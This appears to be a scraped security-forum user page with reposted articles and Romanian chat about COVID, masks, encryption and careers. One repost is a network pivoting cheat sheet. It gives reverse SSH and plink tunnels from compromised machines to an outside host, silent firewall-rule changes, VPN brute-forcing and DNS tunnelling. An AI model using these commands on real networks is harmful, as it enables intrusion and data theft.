Nytro

An elevation of privilege vulnerability exists when Group Policy improperly checks access, aka 'Group Policy Elevation of Privilege Vulnerability'. Sursa; https://github.com/rogue-kdc/CVE-2020-16939

Network Pivoting and Tunneling Guide This is for pure educational & informational purpose. Only use these techniques where allowed or you have permission to do so. Power... Written by Sajal JainOct 22 · 2 min read This is for pure educational & informational purpose. Only use these techniques where allowed or you have permission to do so. Power comes with great responsibility. Port Forwarding – accept traffic on a given IP address and port and redirect it to a different IP address and port apt-get install rinetd cat /etc/rinetd.conf # bindadress bindport connectaddress connectport w.x.y.z 53 a.b.c.d 80 SSH Local Port Forwarding: supports bi-directional communication channels ssh <gateway> -L <local port to listen>:<remote host>:<remote port> SSH Remote Port Forwarding: Suitable for popping a remote shell on an internal non routable network ssh <gateway> -R <remote port to bind>:<local host>:<local port> SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local attacking box to tunnel ALL incoming traffic to ANY host in the DMZ network on ANY PORT ssh -D <local proxy port> -p <remote port> <target> Proxychains – Perform Nmap scan within a DMZ from an external computer Create a reverse SSH tunnel from the Popped machine on: 2222 ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com ssh -f -N -R 2222:<local host>:22 root@<remote host> Create a Dynamic application-level port forward on 8080 thru 2222 ssh -f -N -D &lt;local host>:8080 -p 2222 hax0r@<remote host> Leverage the SSH SOCKS server to perform Nmap scan on the network using proxy chains proxychains nmap --top-ports=20 -sT -Pn $ip/24 HTTP Tunneling nc -vvn $ip 8888 Traffic Encapsulation – Bypassing deep packet inspection HTTP tunnel On the server-side: sudo hts -F <server ip addr>:<port of your app> 80 On the client-side: sudo htc -P <my proxy.com:proxy port> -F <port of your app> <server ip addr>:80 stunnel Tunnel Remote Desktop (RDP) from a Popped Windows machine to your network Tunnel on port 22 plink -l root -pw pass -R 3389:<localhost>:3389 <remote host> Port 22 blocked? Try port 80? or 443? plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P80 Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel (bypass deep packet inspection) Windows machine add required firewall rules without prompting the user netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000 netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080 netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079 Start the http tunnel client httptunnel_client.exe Create HTTP reverse shell by connecting to localhost port 3000 plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P 3000 VLAN Hopping git clone https://github.com/nccgroup/vlan-hopping.git chmod 700 frogger.sh ./frogger.sh VPN Overtaking Identify VPN servers: ./udp-protocol-scanner.pl -p ike $ip Scan a range for VPN servers: ./udp-protocol-scanner.pl -p ike -f ip.txt Use IKEForce to enumerate or dictionary attack VPN servers: pip install pyip git clone https://github.com/SpiderLabs/ikeforce.git Perform IKE VPN enumeration with IKEForce: ./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic Bruteforce IKE VPN using IKEForce: ./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1 Use ike-scan to capture the PSK hash: ike-scan ike-scan TARGET-IP ike-scan -A TARGET-IP ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key ike-scan –M –A –n example\_group -P hash-file.txt TARGET-IP Use psk-crack to crack the PSK hash: psk-crack hash-file.txt pskcrack psk-crack -b 5 TARGET-IPkey psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key psk-crack -d /path/to/dictionary-file TARGET-IP-key PPTP Overtaking Identifying PPTP, it listens on TCP: 1723 NMAP PPTP Fingerprint: nmap –Pn -sV -p 1723 TARGET(S) PPTP Dictionary Attack thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst Port Forwarding/Redirection PuTTY Link tunnel – SSH Tunneling Forward remote port to local address: plink.exe -P 22 -l root -pw "1337" -R 445:<local host>:445 <remote host> SSH Pivoting SSH pivoting from one network to another: ssh -D <local host>:1010 -p 22 user@<remote host> DNS Tunneling dnscat2 supports “download” and “upload” commands for getting iles (data and programs) to and from the target machine. Attacking Machine Installation: apt-get update apt-get -y install ruby-dev git make g++ gem install bundler git clone https://github.com/iagox86/dnscat2.git cd dnscat2/server bundle install Run dnscat2: ruby ./dnscat2.rb dnscat2> New session established: 1422 dnscat2> session -i 1422 DISCLAIMER: Everything is gathered from different web-resources. Parts of the above writeup belong to unknown authors. Written by Sajal Jain Cyber Security Enthusiast | OSCP | CEH | CHFI | CNSS | Masters of IT (Major: IT Security) & Masters of IT Management from the University of Sydney. Sursa: https://catharsis.net.au/blog/network-pivoting-and-tunneling-guide/

Linux (x86) Exploit Development Series Posted on June 26, 2015 by sploitfun First of all I would like to thank phrack articles, its author and other security researchers for teaching me about different exploit techniques, without whom none of the posts would have been possible!! I firmly believe that always original reference articles are the best place to learn stuffs. But at times we may struggle to understand it because it may be not be linear and it may be outdated too. So to the best of my efforts, here I have just simplified and conglomerated different exploit techniques under one roof, inorder to provide a complete understanding about linux exploit development to beginners!! Any questions, corrections and feedbacks are most welcomed!! Now buckle up, lets get started!! I have divided this tutorial series in to three levels: Level 1: Basic Vulnerabilities In this level I will introduce basic vulnerability classes and also lets travel back in time, to learn how linux exploit development was carried back then. To achieve this time travel, with current linux operating system, I have disabled many security protection mechanisms (like ASLR, Stack Canary, NX and PIE). So in a sense this level is kids stuff, no real fun happens!! Classic Stack Based Buffer Overflow Integer Overflow Off-By-One (Stack Based) Level 2: Bypassing Exploit Mitigation Techniques In this level lets get back to current days, to learn how to bypass different exploit mitigation techniques (like ASLR, Stack Canary, NX and PIE). Real fun do happen here!! Bypassing NX bit using return-to-libc Bypassing NX bit using chained return-to-libc Bypasing ASLR Part I using return-to-plt Part II using brute force Part III using GOT overwrite and GOT dereference Level 3: Heap Vulnerabilities In this level lets time travel back and forth, to learn about heap memory corruption bugs. Heap overflow using unlink Heap overflow using Malloc Maleficarum Off-By-One (Heap Based) Use After Free NOTE: The above list is NOT a complete list. Few more topics needs to be covered up. I am working on it, so expect it to be posted soon!! Sursa: https://sploitfun.wordpress.com/2015/06/26/linux-x86-exploit-development-tutorial-series/

Machine Learning Attack Series: Image Scaling Attacks Posted on Oct 28, 2020 #machine learning #huskyai #red This post is part of a series about machine learning and artificial intelligence. Click on the blog tag “huskyai” to see related posts. Overview: How Husky AI was built, threat modeled and operationalized Attacks: Some of the attacks I want to investigate, learn about, and try out A few weeks ago while preparing demos for my GrayHat 2020 - Red Team Village presentation I ran across “Image Scaling Attacks” in Adversarial Preprocessing: Understanding and Preventing Image-Scaling Attacks in Machine Learning by Erwin Quiring, et al. I thought that was so cool! What is an image scaling attack? The basic idea is to hide a smaller image inside a larger image (it should be about 5-10x the size). The attack is easy to explain actually: Attacker crafts a malicious input image by hiding the desired target image inside a benign image The image is loaded by the server Pre-processing resizes the image The server acts and makes decision based on a different image then intended My goal was to hide a husky image inside another image: Here are the two images I used - before and after the modification: If you look closely, you can see that the second image does have some strange dots all around. But this is not noticable when viewed in smaller version. You can find the code on Github. I used Google Colab to run it, and there were some errors initialy but it worked - let me know if interested and I can clean up and share the Notebook also. Rescaling and magic happens! Now, look what happens when the image is loaded and resized with OpenCV using default settings: On the left you can see the original sized image, and on the left the same image downsized to 128x128 pixels. That’s amazing! The downsized image is an entirely different picture now! Of course I picked a husky, since I wanted to attack “Husky AI” and find another bypass. Implications This can have a set of implications: Training process: Images that poisen the training data (as pre-processing rescales images) Model queries: The model might predict on a different image than the one the user uploaded Non ML related attacks: This can also be an issue in other, non machine learning areas. I guess security never gets boring, there is always something new to learn. Mitigations Turns out that Husky AI uses PIL and that was not vulnerable to this attack by default. I got lucky, because initially Husky AI did use OpenCV and it’s default settings to resize images. But for some reason I changed that early on (not knowing it would also mitigate this attack). If you use OpenCV the issue can be fixed by using the interpolation argument when calling the resize API to not have it use the default. Hope that was useful and interesting. Cheers, Johann. @wunderwuzzi23 References Adversarial Preprocessing: Understanding and Preventing Image-Scaling Attacks in Machine Learning (https://www.usenix.org/system/files/sec20-quiring.pdf) (Erwin Quiring, TU Braunschweig) https://github.com/EQuiw/2019-scalingattack Sursa: https://embracethered.com/blog/posts/2020/husky-ai-image-rescaling-attacks/

De multe ori autoritatile nu primesc nicio cheie si cauta solutii alternative. Ca in cazul parolei unui iPhone a unuia pe care il arestasera, au facut NAND mirroring ca sa crackuiasca PIN-ul. Si nu o sa se ajunga niciodata (in tarile civilizate) ca autoritatile sa aiba acces la astfel de "chei" (Root CA-uri ma refer) deoarece ar fi o incalcare grava a dreptului la intimitate si s-ar putea abuza foarte usor. De aceea exista persoane si ONG-uri ca EFF sa ne apere de astfel de lucruri.

Nu am mai auzit nimic referitor la el.

Admini de la ce? Ce site?

E interesanta vulnerabilitatea, pacat insa ca nu e foarte practica: "The issue occurs when a sysadmin inserts an entry into the sudoers file, for example: jacob myhost = (ALL, !root) /usr/bin/chmod"

Va stresati prea rau cu atacurile astea pe protocoale de encriptie. Cam toate sunt bine implementate de persoane care stiu ce fac si daca sunt atacuri disponibile, ca cele de prin TLS, acestea se pot exploata DOAR in cine stie ce conditii sau se pot obtine date cu cine stie ce supercomputer. Cat despre clasicul TLS si clasicul PKI, unde exista multe Root CA-uri, aici se pot face lucruri mai simple si eficiente. Adica daca cineva chiar vrea sa targeteze pe cineva, nu o sa se complice pe atacuri de WhatsApp, Signal sau Telegram cand poate incerca cel putin atacuri simple pe TLS care necesita acces la un Root CA. Dar victimele se pot prinde de asta, au fost firme "suspecte" care au vrut sa devina Root CA si atacul necesita acces la un Root CA... Dar rezultatul poate fi acces la toate aplicatiile, in principal browsere, care nu implementeaza SSL/TLS pinning. Si pana si aplicatiile bancare fac asta. Si nu are niciun rezultat cand e vorba de end to end encryption. Pentru tinte "high profile" se cumpara pe milioane de dolari exploit-uri de iOS/Android.

Sigur, daca ii dai telefonul cu mesajele. Tot ce trebuie sa faca e sa gaseasca aplicatia WhatsApp si sa o deschida.

Prin acel Gigel ma referisem la contul de Twitter al lui https://twitter.com/Dredekia care comentase la acel post. Ok,a marxism, neomarxism, fascism, antifascism, ce o fi. Cine si ce anume are de castigat? Ce se vrea de fapt? Ce interese mari sunt la mijloc? Asa pot spune si eu despre mine ca vin cu ideile mele pentru a provoca nytroxismul. Am interese mari la mijloc.

Ok, vad un tweet de la WEF (irelevant ce este in context, nu stiam de asa ceva oricum) si un Gigel de pe net care zice ceva despre "global reset". Sincer, nu am mai auzit despre asta, zi-ne pe scurt despre ce e vorba si ce legatura are cu Covid, chiar nu stiu. Eu ma gandesc doar ca cineva a sunat la IT Support-ul lui Dumnezeu, i-a zis de problema, si IT support-ul i-a zis "Did you try to reset it?" iar acel cineva vrea sa dea reset Pamantului.

Oh, nici nu stiam ca e tot de la ei.

FAQ aici: https://www.who.int/influenza/human_animal_interface/avian_influenza/h5n1_research/faqs/en/ Cercel (sau cine a scris acel articol) a uitat sa ia in considerare modul de raspandire, dar rata de deces e mare. Cu timpul o sa le aflam pe toate.

Am vazut la cineva pe Linkedin, aparent exista asta: https://lege5.ro/Gratuit/gmztknrygq2q/lista-certificarilor-profesionale-agreate-pentru-efectuarea-testelor-de-penetrare-ordin-553-2019?dp=gi4dqmzyhe2tkoa Sunt socat, nu m-as fi asteptat sa existe asa ceva la noi in legislatie. De fapt, este in legislatie? Si priviti si partea buna: CEH nu e acolo

@shitshow - Vad ca e o teorie conspirationista dar nu am timp sa ma informez despre lucruri inutile, in loc de copy/paste scrie pe scurt despre ce e vorba, nu prea inteleg. @gigiRoman - Ok, deci mor 250.000 de romani anual. De la Covid ar muri inca atatia, deci am ajunge la 500.000 de decese pe an. Am inteles. Da, impactul economic e nasol pentru toata lumea. Nu avem ce face... Si daca e vorba despre a scadea numarul de cazuri si daca e vorba de a diminua impactul economic rezultatul e acelasi: nu exista solutie care sa rezolve complet aceste probleme. Sunt prea multe "necunoscute" si depindem de prea multe lucruri, in mare parte de "oameni".

Da, e foarte important. Eu cand am fost la interviuri, persoanele care ma intervievau: 1. Stiau de mine de pe forum si prezentat la Defcamp 2. Persoana cu care am discutat mi-a zis ca ma urmarea pe Twitter (alte persoane de acolo stiau de asemenea de mine) 3. Ma stiau pentru ca am prezentat la OWASP si Defcon + Github (NetRipper) 4. Ma cunoscusem cu una dintre ele la o conferinta si stiau cate ceva despre prezentari/blog/RST/proiecte Conteaza mult. Trebuie sa demonstrezi ceea ce stii, degeaba treci in CV ca stii mii de lucruri daca nu le demonstrezi, ca si cum ai aplica pe o pozitie de web designer si ai zice ca ai facut sute de site-uri dar nu arati niciunul. PS: Cam la toate firmele la care am lucrat am participat la interviurile de angajare pentru pozitii noi. Activitatea pe forum, prezentari, tutoriale, tool-uri au reprezentat intotdeauna un punct in plus din partea mea. Daca va place domeniul, o sa faceti cate ceva. Cum ziceau suporterii dinamovisti intr-un mesaj: "Pasiunea > Ratiunea".

Salut si bine ai venit! Partea de bug bounty nu mai merge atat de bine ca in trecut pentru ca sunt extrem de multe persoane care fac asta, din toata lumea. Si pe langa asta, multe dintre ele fac asta "non-stop" adica poate mai mult de 8 ore pe zi. Multi sunt idioti care raporteaza numai mizerii dar sunt si multi buni care fac o gramada de bani. Eu nu iti recomand asta pe post de "cariera" din simplul motiv ca nu e ceva stabil. Cel putin nu la inceput. E mai bine sa ai un job cu venit stabil si in timpul liber sa faci bug bounty. Apoi, daca treaba merge bine poti renunta la job sa faci bug bounty full time. Problema e ca te trezesti ca nu mai ai bani si ca... nu gasesti nimic si asa apare presiunea si stresul. Ah, da, desigur, pentru succes pe partea asta trebuie sa o faci pe programe private sau pe programe unde nu au mai sarit mii de oameni pe ele. Cat despre job, la fel ca la orice alt job, e mai greu la inceput. Si pe dev poate fi greu sa gasesti prima pozitie, nu te da batut si "arata ce poti" in CV. Fa bug bounty, fa proiecte, fa un research, scrie un tutorial, orice. O sa dea bine la CV. Multe firme cauta persoane cu experienta pentru ca au nevoie rapid de rezultate. Si la firma la care lucrez am avut nevoie la fel, de cineva senior, care sa vina, sa stea o saptamana si apoi poc, la treaba, singur, fara ajutor. Dar sunt si firme care nu au "graba" aceasta, trebuie doar sa ai rabdare si sa iesi in fata altor persoane, sa demonstrezi ceea ce stii direct din CV. PS: Sper ca in CV ai pus ceea ce ne-ai zis mai sus.

Criza nu va disparea prea curand, nici la inceputul anului viitor inclusiv in cazul in care apare un vaccin bun. Nu exista statisticile astea pe care le vrei tu si nu vor exista vreodata. Pentru a avea totul ca la carte trebuie sa testezi toata populatia, sa vezi ce job au toti, cum au calatorit, cate persoane au intalnit, cu cate persoane au stat x minute de vorba si mai stiu eu ce. Eu nu stiu ce am facut saptamana trecuta... Ai aici statisticile disponibile: https://datelazi.ro/ Din 210.000 de persoane au murit 6400. Daca Romania are 21.000.000 populatia inseamna ca daca ne-am infecta toti romanii ar muri 640.000 de persoane. Sase sute patru zeci de mii. Bine, asta e doar teoretic, normal, ca sunt multi asimptomatici care nici nu stiu ca au fost infectati. Dar tot s-ar ajunge la un numar de 210.000 de decese (sa zicem). Adica 1%. Asta inseamna ca din cei 300 de "prieteni" de pe Facebook imi mor 3. Asta inseamna ca din 500 de useri activi de pe forum mor 5. Vi se pare putin? Mie nu. Nu cred ca de gripa mor atati romani. De fapt e clar asta. Si asta in conditiile in care sunt X masuri luate de care oamenii tot se plang. Ah, sper sa nu incepeti ca mor X persoane anual de cancer ca fac infarct...

Exemplu de protocol bine pus la punct: https://signal.org/docs/ Sau cel folosit de catre Telegram: https://core.telegram.org/mtproto Discutie legata de o comparatie intre ele: https://crypto.stackexchange.com/questions/31418/signal-vs-telegram-in-terms-of-protocols

Am purtat si eu masca sambata, continuu, 09:00 - 19:00 si nu am patit absolut nimic. Exemplul meu era o analogie, nu era o gluma. 1. Consecinta e ca nu te pisi pe celalalt, care e nevinovat 2. Aceti "cativa" sunt foarte multi si nu stiu ca se pisa pe ei. Si se mai si pisa des 3. Pentru ca nu au costume spatiale si nu e garantat ca nu se pot infecta. Un medic care s-a infectat a declarat ca doar si-a dat jos echipamentul in camera de dezechipare si de acolo a luat, dar se poate luat dintr-un milion de alte locuri, inclusiv de la spital (unde e spatiu inchis cu zeci de persoane confirmate pozitiv) si din afara spitalului (magazin, autobuz etc). Nu am vazut pe nimeni sa fie haituit sau speriat ca poarta o mizerie de hartie/textil la gura. Nu am vazut nici politie alergand dupa cineva iar eu nu am avut nicio problema cu absolut nimic de cand e criza asta si port masca. De fapt e bine, nu vede lumea cat de urat sunt. (Glumesc, sunt handsome) Edit: Eu consider ca multi oameni nu prea cred in acest virus si in grvitatea sa din cauza ca nu stiu ei personal persoane infectate. Mai lasati si voi laptop-urile si vorbiti cu oamenii. Eu stiu personal cel putin 10 persoane care au fost infectate, iar in weekend am mai aflat de vreo 4-5. Rude. Unele au avut simptome mai usoare altele... nu chiar.

Super, detalii pentru aplicare sunt aici: https://rstcon.com/cfp/

Legat de porcariile astea cu masca... Haideti sa facem un experiment. Se intalnesc doua persoane. Si se pisa una pe alta, la propriu. Una cu pantaloni pe ea, cealalta fara. Se se intampla? La fel se pun intrebarile: ce se intampla daca ambele persoane au pantaloni sau daca niciuna dintre ele nu are pantaloni? La fel si cu masca. Nu trebuie sa ai studii medicale sa intelegi ca daca porti ceva pe gura si vorbesti (de exemplu cu scuipat), tusesti, sau stranuti, orice ai avea pe fata te ajuta sa nu dai mai departe ce iti iese pe gura. Plm, parca ati crescut in copaci.

Salut, care e rezultatul final? Adica ce vrei sa realizezi printr-o astfel de "operatiune"? Sa obtii acces la niste servere de 2 lei prin care sa dai (D)DoS la cine stie ce alt server de 2 lei? Au evoluat lucrurile. In general se mai gasesc parole slabe, dar nu cred ca la fel de comun ca in trecut. In plus, ca sa pici un server mai serios e nevoie de mai mult decat 5-6 porcarii de VPS-uri. Eu vreau sa cred ca nu se mai practica, ca putem mai mult. Cel putin, cei care fac asta, pun ransomware pe servere si "fac un ban". Cu DDOS-ul ala nu faci nimic. Dar nici asa, sistemele "interesante" nu au "admin:password"-ul de dictionar, deci munca in zadar. Ca mai scapa cate ceva din an in an, se mai intampla, dar daca ar fi mers asta ar fi fost stirile pline de astfel de lucruri. Fiti seriosi.

Eu te cred daca imi dai un link pe web archive dintr-o data de dinainte de 2020. Nu ma intereseaza ce zice OMS sau oricine altcineva. Un document DIN DATA de 2017-2018-2019 ma poate convinge. Haideti sa va spun un secret, eu va zisesem din 2010 de Covid dar nimeni nu m-a crezut